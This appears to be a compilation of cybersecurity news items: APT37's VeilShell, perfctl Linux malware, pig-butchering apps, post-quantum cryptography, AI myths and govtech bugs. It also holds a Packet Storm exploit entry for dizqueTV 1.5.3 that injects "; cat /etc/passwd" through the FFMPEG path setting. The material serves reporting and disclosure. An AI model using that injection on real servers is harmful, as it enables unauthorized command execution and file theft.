It's North Korea versus Cambodia, with Windows default settings and sheer patience allowing the bad guys to avoid easy detection.

Source: motioncenter via Alamy Stock Photo

The North Korean state-sponsored threat actor known as APT37 has been carefully spreading a novel backdoor, dubbed "VeilShell." Of note is its target: Most North Korean advanced persistent threats (APTs) have a history of targeting organizations in South Korea or Japan, but APT37's latest campaign seems to be directed at a nation Kim Jong-Un has more complex relations with: Cambodia.

While Pyongyang still maintains an embassy in Phnom Penh and the two nations share a history of Soviet ties in the region, the modern-day relationship between the two is far from cozy. The DPRK's nuclear weapons program, ongoing missile tests, cyber activities, and general aggression towards its neighbors contradicts Cambodia's stance on weapons of mass destruction (WMDs) and its call for meaningful diplomatic dialogue between all countries in the region, observers in the region have noted.

That wariness has drawn the attention of the North Korean regime, according to Securonix, which has flagged a new campaign called "Shrouded#Sleep" circulating against Cambodian organizations.

Securonix did not share detailed victimology, but to lure in targets, APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, ScarCruft, and Ricochet Chollima) has been spreading malicious emails relating to Cambodian affairs, and in Cambodia's primary language, Khmer. One lure for instance offers recipients access to a spreadsheet related to annual income in US dollars across various sectors in the country, such as social work, education, health, and agriculture.

Related:China-Backed APT Group Culling Thai Government Data

Hidden in these emails are maliciously crafted shortcut files concealing the backdoor, used to establish quiet persistence in targeted networks.

**Shrouded#Sleep's Stealthy Shortcuts**

In terms of the infection routine, a Shrouded#Sleep infection begins, like many others do, with a .ZIP archive containing a Windows shortcut (.LNK) file.

"It's incredibly common — if you were to throw a dart at the threat actor dartboard, a shortcut file is probably going to be hit," says Tim Peck, senior threat researcher at Securonix. "It's easy, it's effective. It pairs really well with phishing emails. And it's easy to mask."

Windows hides the .LNK file extension by default, substituting it with a little arrow in the bottom left hand corner of a file's icon, making for an overall cleaner user interface. The upshot is that attackers like APT37 can swap a .LNK's default icon with another of their choosing, and use double extensions to hide the true nature of the file.

APT37 gives its shortcut files PDF and Excel icons, and assigned them double extensions like ".pdf.lnk," or ".xls.lnk," so that only the .PDF and .XLS parts of the extension show up for users.

Related:UAE, Saudi Arabia Become Plum Cyberattack Targets

In the end, Peck notes, "Unless you're looking for the little arrow that Microsoft adds on shortcut files, odds are you might miss that." An unreasonably eagle-eyed victim might also have noticed that unlike typical shortcut files — which tend to be just a few kilobytes in size — these were anywhere from 60 to 600 kilobytes.

Contained within those kilobytes was APT37's malicious payload, which Securonix has named "VeilShell." 

**VeilShell's Patient Persistence**

The SHROUDED#SLEEP campaign is notable for its state-of-the-art blend of living-off-the-land and proprietary tools, plus impressive persistence and stealth mechanism.

"It represents a sophisticated and stealthy operation targeting Southeast Asia leveraging multiple layers of execution, persistence mechanisms, and a versatile PowerShell-based backdoor RAT to achieve long-term control over compromised systems," according to the Securonix analysis. "Throughout this investigation, we have shown how the threat actors methodically crafted their payloads and made use of an interesting combination of legitimate tools and techniques to bypass defenses and maintain access to their targets."

Related:China's 'Earth Baxia' Spies Exploit Geoserver to Target APAC Orgs

VeilShell for instance is a multifunctional, PowerShell-based backdoor-plus-remote-access-trojan (RAT). It's capable of all the things RATs tend to do: download and upload files, modify and delete existing files on the system, modify system settings, create scheduled tasks for persistence, etc.

Notably, APT37 also achieves persistence via AppDomainManager injection, a rarer technique involving the injection of malicious code into .NET applications.

All of these malicious functions and techniques might otherwise make a lot of noise on targeted systems, so APT37 uses some tricks to provide counterbalance. For example, it implements long sleep timers to break up different stages of the attack chain, ensuring that malicious activities don't occur in obvious succession.

As Peck tells it, "The threat actors were incredibly patient, slow, and methodical. They used a lot of long sleep timers — we're talking, like, 6,000 seconds in between different attack stages. And the main goal \[of the shortcut file\] was to set the stage. It didn't actually execute any malware. It dropped the files into a location that would allow them to execute on their own on the next system reboot. That reboot could be the same day, or a week from now, depending on how the user uses their PC."

It was emblematic, perhaps, of a threat actor with confidence and patience to spare. "A lot of times we see these dive in, dive out types of campaigns. But this was definitely designed with stealth in mind," he says.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

DPRK's APT37 Targets Cambodia With Khmer, 'VeilShell' Backdoor

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

**dizqueTV 1.5.3 Remote Code Execution**

Posted Oct 3, 2024

Authored by Ahmed Said Saud Al-Busaidi

dizqueTV version 1.5.3 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution

SHA-256 | b18cb14167c97952ef1684789d6a48b83e5c1338a0677edc0b3eaef195497b45

Download | Favorite | View

**dizqueTV 1.5.3 Remote Code Execution**

    # Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE)# Date: 9/21/2024# Exploit Author: Ahmed Said Saud Al-Busaidi# Vendor Homepage: https://github.com/vexorian/dizquetv# Version: 1.5.3# Tested on: linuxPOC:## Vulnerability DescriptiondizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers.## STEPS TO REPRODUCE1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'"3. click on update4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

**File Tags**

*   ActiveX (933)
*   Advisory (87,037)
*   Arbitrary (17,123)
*   BBS (2,859)
*   Bypass (1,932)
*   CGI (1,049)
*   Code Execution (7,927)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,438)
*   DoS (25,312)
*   Encryption (2,395)
*   Exploit (54,379)
*   File Inclusion (4,278)
*   File Upload (1,026)
*   Firewall (822)
*   Info Disclosure (2,927)
*   Intrusion Detection (921)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,313)
*   Local (14,866)
*   Magazine (587)
*   Overflow (13,229)
*   Perl (1,435)
*   PHP (5,293)
*   Proof of Concept (2,415)
*   Protocol (3,753)
*   Python (1,664)
*   Remote (31,931)
*   Root (3,674)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,660)
*   Security Tool (8,055)
*   Shell (3,310)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,739)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,135)
*   Web (10,147)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,308)
*   Other

**File Archives**

*   October 2024
*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,132)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,599)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,415)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,936)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,896)
*   UNIX (9,464)
*   UnixWare (188)
*   Windows (6,782)
*   Other

dizqueTV 1.5.3 Remote Code Execution

NIST standardized three algorithms for post-quantum cryptography. What does that mean for the information and communications technology (ICT) industry?

Source: Cynthia Lee via Alamy Stock Photo

COMMENTARY

After a grueling eight years of testing, the National Institute of Standards and Technology (NIST) has finalized the first three algorithms that will form the backbone of the world's strategy to counter the potential threats of quantum computing.

Given that enterprising hackers are likely already harvesting and storing massive volumes of encrypted sensitive data for future exploitation, this is welcome news. We have the first post-quantum cryptography (PQC) algorithms to defend against the inevitable attacks on "Q-Day," when a cryptographically relevant quantum computer (CRQC) comes online.

Still, having these NIST-approved algorithms is just the first step. For the information and communications technology (ICT) industry, transitioning to a quantum-safe infrastructure is not a straightforward task; numerous challenges must be overcome. It requires a combination of engineering efforts, proactive assessment, evaluation of available technologies, and a careful approach to product development.

**The Post-Quantum Transition**

PQC algorithms are relatively new, and with no CRQC available to fully test, we cannot yet achieve 100% certainty of their success. Yet we know that any asymmetric cryptographic algorithm based on integer factorization, finite field discrete logarithms, or elliptic curve discrete logarithms will be vulnerable to attacks from a CRQC using Shor's algorithm. That means key agreement schemes (Diffie-Hellman or Elliptic Curve Diffie-Hellman), key transport (RSA encryption) mechanisms, and digital signatures must be replaced.

Conversely, symmetric-key cryptographic algorithms are generally not directly affected by quantum computing advancements and can continue to be used, with potentially straightforward increases to key size to stay ahead of quantum-boosted brute-forcing attacks.

**Hybrid Approach to Security**

The migration to PQC is unique in the history of modern digital cryptography in that neither traditional nor post-quantum algorithms are fully trusted to protect data for the required lifetimes. During the transition from traditional to post-quantum algorithms, we will need to use both algorithm types.

Defense and government institutions have already begun integrating these algorithms into the security protocols of specific applications and services due to the long-term sensitivity of their data. Private companies have also kicked off initiatives. For instance, Apple is using Kyber to create post-quantum encryption in iMessage, while Amazon is using Kyber in AWS.

Large-scale proliferation of PQC is coming, as global standards bodies, such as 3GPP and IETF, have already begun incorporating them into the security protocols of future standards releases. For instance, the IETF-designed Transport Layer Security (TLS) and Extensible Authentication Protocol-Authentication and Key Agreement (EAP-AKA) — two of the most widely used protocols across 3GPP networks— will both incorporate PQC.

This kind of standardization is key for industries like telecommunications and Internet services, where hundreds of different companies are providing the different hardware, device, and software components of a network. Like any security protocol, PQC must be implemented consistently across all exposed elements in the network chain because any link that isn't quantum-safe will become the focal point of any data harvesting attack.

Over the next few years, we will see more and more PQC-enhanced products enter the market. At first, they will likely use hybrid approaches to security, using both classical and post-quantum encryption schemes, as Apple and Amazon have done. But as quantum-security technologies advance and are further tested in the market, PQC will likely replace classical asymmetric encryption methods.

Because asymmetric algorithms are largely used for secure communications between organizations or endpoints that may not have previously interacted, a significant amount of coordination in the ecosystem is needed. Such transitions are some of the most complicated in the tech industry and will require staged migrations.

**Ready for Q-Day**

PQC isn't the only way to protect against a quantum attack, as quantum threats will only increase in sophistication. It's vital to deploy a defense-in-depth strategy — one that includes physics-based solutions like preshared keys with symmetric distribution and quantum key distribution (QKD) — but PQC will be a powerful security tool.

Attention to interoperability will be key here, as crypto agility will ease the migration to pure quantum-safe algorithms in the future. Some companies are already leaning toward open source rather than proprietary code, which can help to avoid a bumpy upgrade path in future for security products. As well, this crypto agility will ensure that technologies being designed now for inclusion in next-generation/6G products will also have backward-compatibility with 5G and other earlier standards.

Now that we have the essential first algorithms to build our arsenal against quantum computing threats, the next steps for the ICT industry will be critical. They must adopt hybrid solutions now to combat harvest-now-decrypt-later attacks; embrace crypto agility, interoperability, and rigorous testing; and deploy a defense-in-depth strategy. By following this strategy, we will be well on track to ensuring our long-term security and saving the world from potential disaster when Q-Day comes.

**About the Author**

Senior Research Scientist, Nokia

Aritra Banerjee is a Senior Research Scientist in Nokia Standards leading quantum-safe standardization efforts. His research interests span cryptography, quantum technologies, security, privacy-preserving technologies, and machine learning trends.

What Communications Companies Need to Know Before Q-Day

Armed with a staggering arsenal of at least 20,000 different exploits for various Linux server misconfigurations, perfctl is everywhere, annoying, and tough to get rid of.

Source: J Poulssen via Alamy Stock Photo

A multipurpose and mysterious malware dropper has been terrorizing Linux servers worldwide for years, infecting untold thousands of victims with cryptomining and proxyjacking malware. A fresh analysis has exposed its secrets — and a vast treasure trove of tens of thousands of exploit paths for compromising its targets.

It's been some time now that individuals in the US and Russia, Germany and Indonesia, Korea, China, Spain, and most everywhere in between have been reporting cases of "perfctl" (aka perfcc) eating up all their compute power.

"We've seen blog and forum posts over the past three or four years — maybe even longer — saying, 'something is attacking me, I don't know, I'm trying to kill it,'" Aqua Nautilus chief researcher Assaf Morag recalls. "There are a lot of articles describing how you kill perfctl, but people can't kill it because it keeps hiding itself, and it's very persistent."

The malware looks for vulnerabilities and misconfigurations to exploit in order to gain initial access. To date, Aqua Nautilus reported today, the malware has likely targeted millions of Linux servers, and compromised thousands. Any Linux server connected to the Internet is in its sights, so any server that hasn't already encountered perfctl is at risk.

Related:Dark Reading News Desk Live From Black Hat USA 2024

And, Morag warns, its ambitions don't necessarily end with cryptomining and proxyjacking. Though not recorded in his report, Morag has observed the malware dropping TruffleHog, a legitimate penetration testing tool designed to snuff out hardcoded secrets in source code.

"So imagine: They're earning money on the side \[by cryptomining and proxyjacking\], but also stealing secrets and maybe selling them in the cyber underground — selling access to servers that are related to big companies," he posits.

**Every Misconfiguration in the Book**

The volume and variety of potential server misconfigurations that perfctl is capable of identifying and exploiting is vast.

By tracking its infections, researchers identified three Web servers belonging to the threat actor: two that were previously compromised in prior attacks, and a third likely set up and owned by the threat actor. One of the compromised servers was used as the primary base for malware deployment. The other compromised server contained a much more interesting find: a list of potential avenues to directory traversal, nearly 20,000 entries long.

The list contained more than 12,000 known server misconfigurations, nearly 2,000 paths towards nabbing unauthorized credentials, tokens, and keys, more than 1,000 techniques for unauthorized login, and dozens of possible misconfigurations in different applications (68, for example, associated just with Apache RocketMQ, the open source distributed messaging and streaming platform). Citing just a few examples, Morag explains that "if you have an HTTP server, maybe you expose a template. In Kubernetes, by mistake, you could expose secrets, or roles. Or even a weak password can be a misconfiguration."

Related:Darktrace Announces Formal Completion of its Acquisition by Thoma Bravo

Alongside this fuzzing list on the compromised server were follow-on files containing exploits for the various kinds of documented misconfigurations.

Besides misconfigurations, perfctl is also capable of gaining initial access to a server via various bugs, such as CVE-2023-33246, a remote command execution (RCE) vulnerability in Apache RocketMQ. CVE-2023-33246 earned a "critical" 9.8 out of 10 score on the Common Vulnerability Scoring System (CVSS) last year.

**How perfctl Hides Loud Activity**

Cryptomining and proxyjacking are loud by nature. Whether it be third-party proxyware or the XMRig Monero miner, the programs that perfctl drops onto a compromised server will exhaust its CPU resources. And yet, perfctl itself is not easy to spot or excise, thanks to its layers of sophisticated stealth and persistence mechanisms.

Related:LockBit Associates Arrested, Evil Corp Bigwig Outed

For example, to facilitate stealthy communication, the program drops a backdoor and listens for communications via Tor. And to avoid detection and obscure evidence of its presence, it uses process masquerading, copying itself to various locations under names that map to legitimate system processes.

The very name its authors gave to it, "perfctl," is evidence of the same sort of tactic: "perf" is a Linux monitoring tool, and "ctl" is commonly used as a suffix for command line tools which control system components or services. The legitimate-looking name of the malware, then, allows it to more easily blend in with typical processes.

And then, after executing, perfctl deletes its binary but continues to run as a service behind the scenes.

To further hide its presence and malicious activities from security software and researcher scrutiny, it deploys a few Linux utilities repurposed into user-level rootkits, as well as one kernel-level rootkit. The kernel rootkit is especially powerful, hooking into various system functions to modify their functionality, effectively manipulating network traffic, undermining Pluggable Authentication Modules (PAM), establishing persistence even after primary payloads are detected and removed, or stealthily exfiltrating data.

And when a user logs in to the compromised server, perfctl instantly halts its noisiest behaviors, laying low until the user logs off and the coast is clear.

In short, "it's a powerful tool," Morag says. "You can decide to erase data, to steal data, to buy cryptocurrency, to do proxyjacking — it's up to the attacker."

**Mitigation for perfctl & Other Fileless Malware**

Those running Linux servers should take immediate steps to protect their environments, researchers warned. Aqua recommends the following mitigations for perfctl and similar threats:

*   Patch vulnerabilities: Ensure that all vulnerabilities are patched. Particularly internet facing applications such as RocketMQ servers and CVE-2021-4043 (Polkit). Keep all software and system libraries up to date.
    
*   Restrict file execution: Set noexec on /tmp, /dev/shm and other writable directories to prevent malware from executing binaries directly from these locations.
    
*   Disable unused services: Disable any services that aren’t required, particularly those that may expose the system to external attackers, such as HTTP services.
    
*   Implement strict privilege management: Restrict root access to critical files and directories. Use role-based access control (RBAC) to limit what users and processes can access or modify.
    
*   Network segmentation: Isolate critical servers from the internet or use firewalls to restrict outbound communication, especially TOR traffic or connections to cryptomining pools.
    
*   Deploy runtime protection: Use advanced anti-malware and behavioral detection tools that can detect rootkits, cryptominers, and fileless malware like perfctl.
    

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Near-'perfctl' Fileless Malware Targets Millions of Linux Servers

A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims, per findings from Group-IB.
The campaign is part of a consumer investment fraud scheme that's also widely known as pig butchering, in which prospective victims are lured into making investments in cryptocurrency or other financial

A large-scale fraud campaign leveraged fake trading apps published on the Apple App Store and Google Play Store, as well as phishing sites, to defraud victims, per findings from Group-IB.

The campaign is part of a consumer investment fraud scheme that's also widely known as pig butchering, in which prospective victims are lured into making investments in cryptocurrency or other financial instruments after gaining their trust under the guise of a romantic relationship or an investment advisor.

Such manipulative and social engineering operations often end with the victims losing their funds, and in some cases, extracting even more money from them by requesting various fees and other payments.

The Singapore-headquartered company said the campaign has a global reach, with victims reported across Asia-Pacific, European, Middle East and Africa. The bogus apps, built using the UniApp Framework, have been classified under the moniker **UniShadowTrade**.

The activity cluster is said to have been active since at least mid-2023, luring victims with malicious apps with the promise of quick financial gain. A noteworthy aspect of the threat is that one of the apps managed to even get past Apple's App Store review process, thus lending it an illusion of legitimacy and trust.

The app in question, SBI-INT, is no longer available for download from the app marketplace, but it masqueraded as software for "commonly used algebraic mathematical formulas and 3D graphics volume area calculation."

It's believed that the cybercriminals accomplished this by means of a check that included the app's source code that checked if the current date and time is earlier than July 22, 2024, 00:00:00, and if so, launched a fake screen with formulae and graphics.

But once it was taken down weeks after it was published, the threat actors behind the operation are said to have pivoted to distributing the app, for both Android and iOS, via phishing websites.

"For iOS users, pressing the download button triggers the download of a .plist file, prompting iOS to ask for permission to install the application," Group-IB researcher Andrey Polovinkin said.

"However, after the download is complete, the application cannot be launched immediately. The victim is then instructed by the cybercriminals to manually trust the Enterprise developer profile. Once this step is completed, the fraudulent application becomes operational."

Users who end up installing the app and opening it are greeted with a login page, requiring users to provide their phone number and password. The registration process involves entering an invitation code in the app, suggesting that the attackers are targeting specific individuals to pull off the scam.

A successful registration triggers a six-step attack process wherein the victims are urged to provide identity documents as proof, personal information, and current job details, after which they are asked to agree to the service's terms and conditions in order to make the investments.

Once the deposit has been made, the cybercriminals send further instructions on which financial instrument to invest in and often guarantee that they will yield high returns, thereby deceiving users into investing more and more money. To maintain the ruse, the app is rigged to display their investments as making gains.

Trouble starts when the victim attempts to withdraw the funds, at which point they are asked to pay additional fees to recover their principal investments and purported gains. In reality, the funds are stolen and diverted to accounts under the attackers' control.

Another novel tactic adopted by the malware authors is the use of an embedded configuration that includes specifics about the URL that hosts the login page and other aspects of the purported trading application launched within the app.

This configuration information is hosted in a URL associated with a legitimate service called TermsFeed that offers compliance software for generating privacy policies, terms and conditions, and cookie consent banners.

"The first discovered application, distributed through the Apple App Store, functions as a downloader, merely retrieving and displaying a web-app URL," Polovinkin said. "In contrast, the second application, downloaded from phishing websites, already contains the web-app within its assets."

This, per Group-IB, is a deliberate approach taken by the threat actors to minimize the chances of detection and avoid raising red flags when the app is distributed through the App Store.

Furthermore, the cybersecurity firm said it also discovered one of the fake stock investment scam apps on the Google Play Store that went by the name FINANS INSIGHTS (com.finans.insights). Another app linked to the same developer, Ueaida Wabi, is FINANS TRADER6 (com.finans.trader)

While both Android apps are not present in the Play Store, statistics from Sensor Tower show that they were downloaded less than 5,000 times. Japan, South Korea, and Cambodia were the top three countries served by FINANS INSIGHTS, whereas Thailand, Japan, and Cyprus were the primary regions where FINANS TRADER6 was available.

"Cybercriminals continue to use trusted platforms such as the Apple Store or Google Play to distribute malware disguised as legitimate applications, exploiting users' trust in secure ecosystems," Polovinkin said.

"Victims are lured in with the promise of easy financial gains, only to find that they are unable to withdraw funds after making significant investments. The use of web-based applications further conceals the malicious activity and makes detection more difficult."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Fake Trading Apps Target Victims Globally via Apple App Store and Google Play

Pig Butchering scam targets crypto users with fake trading apps on Apple and Google Play Stores. Disguised as…

Pig Butchering scam targets crypto users with fake trading apps on Apple and Google Play Stores. Disguised as legitimate platforms, these apps defraud investors, bypassing store checks and exploiting unsuspecting users globally.

A fraud campaign targeting **Apple iOS and Android users** has been discovered by GroupIB, involving fake trading apps. These apps, found on Apple’s App Store and Google Play, and on phishing sites, are part of a Pig Butchering scam targeting cryptocurrency investors in Asia-Pacific, Middle East & Africa, and European regions.

Group-IB’s Threat Intelligence, and Fraud Protection analysts first discovered these fake mobile applications in May 2024 and have been investigating the campaign ever since.

According to their **report** shared with Hackread.com ahead of publishing on Wednesday, these applications were developed for Android using a single cross-platform framework. One was distributed through the Google Play store, while another targeted iOS devices.

What’s worse, unlike traditional mobile trojans, these applications had no typical malicious features and cybercriminals have created a facade of a legitimate trading platform to defraud victims.

The fraudulent apps check the current date and time to bypass Apple’s App Store checks, launching a fake activity with mathematical formulas and graphics if it is earlier than 22 July 2024, 00:00:00. Android samples were designed to display a fraudulent trading application hosted on the api.fxbrokerscc domain, part of a larger fraudulent infrastructure.

According to researchers, these fake trading apps and downloader apps mimic legitimate platforms and may include features like account settings, transaction history, and stock information. Downloader apps, found in the Apple App Store or distributed through phishing websites, prompt victims to install the fraudulent app.

Fake app on Apple Store (left) – Fake app on Google Play Store (Screenshot: Ground-IB)

The malware family used in the pig butchering scam is **UniShadowTrade**, classified under the UniApp Framework. This name is given by Group-IB analysts to categorize the fraudulent applications involved in the scam. For your information, the UniApp framework enables developers to create cross-platform applications with a single codebase, making it easier for scammers to develop and distribute malware.

****What Exactly is Pig Butchering?****

For your information, **Pig butchering** is a notorious digital scam that involves a meticulous process of grooming victims, building trust, and ultimately defrauding them of their money.

This particular campaign follows a specific pattern: target identification through social media, grooming and trust-building through social engineering techniques, offering a seemingly lucrative investment opportunity in cryptocurrency or other investments, encouraging a small initial investment, and building confidence through small profits.

Scammers pressure victims into making large investments, transfer funds they cannot withdraw, and disappear. This process continues until the victim is unable to withdraw the funds, causing significant financial loss and affecting their financial stability.

Nevertheless, scams Pig butchering can have devastating consequences for victims. Understanding scammers’ tactics and taking proactive measures can reduce the risk of falling victim to such fraud.

****Alert for Android and iOS users****

It is a fact that Google, which owns Android, and Apple, which owns the iOS App Store, try their best to keep the marketplace safe from malware and other cybersecurity threats. Despite constant monitoring, cybercriminals often slip into these stores with malicious apps, draining the bank accounts and crypto wallets of unsuspecting users.

Just last week, **Google approved** a crypto drainer app on the Play Store that stole over $70,000 from Android users. On the other hand, **in February 2024**, Apple approved a fake LastPass Password Manager app on its iOS App Store. The same month, Apple approved a **fake Rabby Wallet app** that stole millions from unsuspecting users.

Therefore, be extra careful when downloading an app from any of these stores. Check their reviews, search for the official app on Google, find their social media platforms, and confirm whether the app advertised on app stores is legitimate or not.

1.  **Phishing Scam Hits European Bank Users on iOS and Android**
2.  **Scylla Ad Fraud on iOS, Android Users Halted by Apple, Google**
3.  **Pink Drainer Posed as Journalists, Stole $3M from Twitter Users**
4.  **Hackers Posed as Google Support to Steal $243 Million in Crypto**
5.  **Apple mistakenly approved malware masked as Adobe Flash Player**

Pig Butchering: Fake Trading Apps Target Crypto on Apple, Google Play Stores

Organizations looking to maximize their security posture will find AI a valuable complement to existing people, systems, and processes.

Source: marcos alvarado via Alamy Stock Photo

COMMENTARY

The global rise of increasingly sophisticated cybercrimes creates daily challenges for the cybersecurity industry, as security professionals grapple with new and evolving attacks, complex IT architecture, and the integration of artificial intelligence (AI) into nefarious actors' tactics, techniques, and procedures (TTPs). As a result, cybersecurity practitioners feel a sense of urgency to stay at the forefront of technological advances to defend against a growing arsenal of exploits.

In this environment, a methodical approach to the intentional use of AI for cybersecurity protocols will help avoid falling prey to the hype and myths of groupthink, such as these five myths of AI and cybersecurity: 

**1\. You'll fall behind if AI isn't your primary solution for cybersecurity.**

While AI can enhance cybersecurity tasks by analyzing large volumes of data to recognize nefarious identifying patterns, it can also be susceptible to false positives and negatives, be trained on bad data, or act in unexpected ways. Many common cyber threats can still be effectively mitigated through basic security practices like strong passwords, regular patching, and employee awareness about social engineering. Incorporating AI into security solutions is not a license to abandon proven tools and replace established best practices. Sophisticated attackers will find ways to evade AI-based detection, so adopting AI cannot be the only solution for security and defense. Time-tested security practices like organizational culture, leadership commitment, and employee training are still critical fundamentals of a robust organizational risk management practice. 

**2\. Threat actors are using AI, which will lead to an exponential increase in cyberattacks.**

AI is undoubtedly a powerful tool that can be used for both good and bad — it's not a guaranteed game-changer for threat actors. The cybersecurity landscape is a dynamic battleground, and the interplay between AI-powered attacks and defenses is complex. AI may increase the speed and sophistication of certain attacks, such as better phishing attempts; however, it has not fundamentally changed the attack vectors or the attack surface within organizations. A mature security posture using foundational defensive practices continues to be a sound approach to reducing risk and thwarting attacks. 

**3\. AI-powered tools are better, and every tool needs an AI feature.**

AI-aided tools can provide powerful additions to a defensive infrastructure with quicker, more comprehensive data discovery. Left unchecked, AI is capable of producing sometimes comical but altogether bad results, such as the Google Overview suggestion of adding glue to homemade pizza sauce, or the McDonald's AI drive-through putting bacon on ice cream. In cybersecurity, erroneous results have serious consequences, including loss of trust, excessive costs, and endangering human safety. The potential benefit of any AI-powered resource must be balanced against the potential cost of error. The safest use of AI is within a layered defense model, which allows for verification and redundancy in protective solutions. 

**4\. You can only combat AI with AI.**

AI is a valuable tool in the cybersecurity quiver, but it's not impenetrable. Like any other defensive technique, attackers can exploit vulnerabilities in AI models or develop exploits to bypass AI defenses. Combating AI threats requires a multilayered approach that combines AI with human expertise, traditional security measures, and a strong focus on prevention, detection, and response. Using AI to combat AI may also raise ethical and legal concerns, particularly around issues like autonomous decision-making, accountability, and potential for misuse. These concerns must be carefully considered before implementation, to ensure responsible, ethical use of AI in cybersecurity. By leveraging the strengths of both humans and AI, organizations can build a more resilient and effective cybersecurity posture. 

**5\. AI is going to replace your job.**

Companies who are hiring fewer entry-level people for cybersecurity roles are not doing so because AI has eliminated those jobs; rather, they are limited by shrinking budgets and a need to hire people who can make an immediate impact when they come onboard. AI excels at automating repetitive tasks, analyzing vast amounts of data and identifying patterns, but human intuition and judgment is still needed to interpret those insights, make critical decisions, and adapt strategies to combat evolving threats. At its best, AI allows humans to focus on creative and strategic thinking to deliver complex problem-solving. The prominence of AI has created new jobs like AI engineers and AI ethicists to manage AI systems. AI-related roles, along with roles in cybersecurity, will continue to emerge and evolve. AI won't replace people, but people who know how to work with AI may replace people who don't. 

Effective cybersecurity requires a multilayered approach that combines technology, processes, and people. Solely relying on AI for cybersecurity can create a false sense of security, and AI-based cybersecurity solutions can be costly and complex. While AI is transforming the workforce, it's unlikely to lead to widespread job displacement. Instead, it likely will change the nature of work and require adaptation and development of new skills.

Progressive companies will see the value of investing in training programs and implementing policies that support workforce transition. Organizations looking to maximize their security posture with enhanced value, productivity, creativity, and innovation will find AI a valuable complement to existing people, systems, and processes.  

**About the Authors**

Senior Vice President & Executive Dean, Western Governors University

Paul Bingham is the senior vice president and executive dean at Western Governors University’s School of Technology, which currently serves 60,000 students nationwide and is the top conferrer of cybersecurity degrees in the country. Prior to WGU, Paul spent 24 years as an FBI agent, leading and managing domestic and international cybersecurity investigations and FBI SWAT teams on over 100 high-risk tactical missions. 

SIEM & Data Analytics Engineer, H2L Solutions Inc.

Micah VanFossen is a cybersecurity engineer currently working as a SIEM & Data Analytics Engineer at H2L Solutions Inc., where he focuses on data ETL (enrich, transform, load) processes, detections, and data analysis. He is a lifelong learner, spending time researching, studying, and educating others through his blog, The Purple Van. Micah is also a member of the SIII Tiger Team for the US Cyber Games Program and holds an MS in cybersecurity and information assurance from WGU.

Top 5 Myths of AI &amp; Cybersecurity

Poor permission controls and user input validation is endemic to the platforms that protect Americans' legal, medical, and voter data.

Source: Xinhua via Alamy Stock Photo

A veritable laundry list of high- and critical-severity bugs have been uncovered in software platforms used by government agencies across the US.

Govtech systems are some of the most critical out there, responsible for storing the most sensitive personally identifying information (PII) US citizens own: Social Security numbers (SSNs) and IDs; legal and medical records; voter registrations; and much more. It will surprise few and comfort no one that these systems also happen to be riddled with vulnerabilities. 

Security researcher Jason Parker uncovered issues in 19 such platforms this year, disclosing more than a handful of them late last week. There was the bug in the state of Georgia's portal for canceling voter registrations, the access control issue that exposed court documents in counties across Florida, and the many critical vulnerabilities bogging down a public records request management platform used by hundreds of city, county, and state governments nationwide.

**Case Study: A Voter Registration Issue**

Some might be old enough to remember when government bugs were cool and inventive. "The Thing," for example — a listening device embedded into a wooden seal, which hung in the residence of the US ambassador to Moscow for seven years before it was discovered.

Today's government bugs are rather banal — access control flaws or improper validations of user input. The kinds of things hackers can use them for, however, are not at all dull.

At the end of July, for example, Georgia launched a voter cancellation request portal. Within days, researchers discovered multiple issues with the site. Parker, for example, found that anyone could submit a cancellation request using only the information easily gleaned from public sources — names, dates of birth, counties of residence — while skipping any requirement for more serious PII, like a driver's license or SSN. The issue earned a "high" Common Vulnerability Scoring System (CVSS) score of 8.6 out of 10, and was fixed shortly after initial disclosure.

It turned out that members of the public had attempted to take real advantage of these issues in the meantime, though, most notably by unsuccessfully deregistering Rep. Marjorie Taylor Greene, and Georgia's Secretary of State Brad Raffensperger, two prominent Republicans in the state.

**A Panoply of GovTech Bugs**

This kind of basic lack of authentication was emblematic of the security flaws Parker has stumbled upon.

Besides the Georgia bug, for example, were the trio of bugs in Granicus' GovQA. GovQA is a public records management system that is used by more than one-third of the largest US cities, more than 80 state agencies, and nearly half of the "top" US counties, according to GovQA's website.

Another series of bugs in Granicus' electronic filing system allowed for the leakage of sensitive information, the ability to block user logins or modify accounts without authorization, and privilege escalation. The "critical," 9.8 CVSS-rated bugs were reportedly patched back in April.

